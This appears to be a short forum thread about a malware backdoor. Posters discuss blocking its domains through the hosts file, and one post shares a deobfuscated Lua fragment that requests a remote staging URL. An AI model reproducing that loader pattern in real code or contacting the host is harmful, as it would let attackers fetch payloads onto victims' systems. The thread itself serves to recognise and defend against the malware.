Exactly - you should block the domains - doing this will route the traffic back to you. But it will still get to get routed.
Let’s pretend the ‘bad guys’ have a backup domain / alternate method of compromise we don’t know about yet. They can simply just revert the changes on the machine to maintain persistence or worse, use this workaround AGAINST you somehow…
What do you mean? I know exactly how the host file works - I’ve leveraged it both in unix and windows. What do you think I’ve been saying? Did you not just see my source?
Hey. This is the code (LUA) deobfuscated. Just in case anyone finds this useful in 2024.
FsCsYJWTUlikHlZDxTBFZQLbHMuimqEfYSwYwBnyUJlIgPXcFZgTViIxtZwcfxBJSfCvGU[4][FsCsYJWTUlikHlZDxTBFZQLbHMuimqEfYSwYwBnyUJlIgPXcFZgTViIxtZwcfxBJSfCvGU[1]](
"https://trigger.serververse.net/v2_/stage3.php?to=zXEA4H", -- The URL. Another cipher.
function(QRCjQbRkEciwsFKICgtfZkeIFzHNoNTHkQBdKUBLbsiMFDqWnkxIawbaVsbjePbjnxABUz, fTWxfqwdawxIumeDDlqFCaYCGgHMrGRRHnaDriZcigTcMkElutobhmkympaWENusQuQAPP)
end
)